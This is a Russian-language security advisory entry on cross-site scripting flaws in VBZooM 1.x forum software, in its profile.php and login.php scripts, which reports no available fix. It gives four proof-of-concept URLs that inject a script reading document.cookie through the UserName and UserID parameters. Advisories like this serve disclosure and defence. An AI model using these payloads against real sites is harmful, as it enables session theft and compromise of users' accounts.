Дата публикации: | 04.08.2005 |
Всего просмотров: | 1552 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2005-2441 CVE-2006-1132 CVE-2006-1133 CVE-2006-3054 CVE-2006-3055 CVE-2006-3056 CVE-2006-3142 CVE-2006-4634 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | VBZooM 1.x |
Уязвимые версии: VBZooM
Описание: Уязвимость существует в сценариях 'profile.php' и 'login.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры: http://[target]/vbzoom/profile.php?UserID=1&UserName= <br><script>alert(document.coo kie);</script> http://[target]/vbzoom/login.php?UserID='<br><script> alert(document.cookie);</script> http://[target]/vz/profile.php?UserID=1&UserName= <br><script>al ert(document.cookie);</script> http://[target]/vz/login.php?UserID='<br><script> alert(document.cookie);</script> URL производителя: www.vbzoom.com Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | VBZoom Cross Site Scripting Vulnerabilities |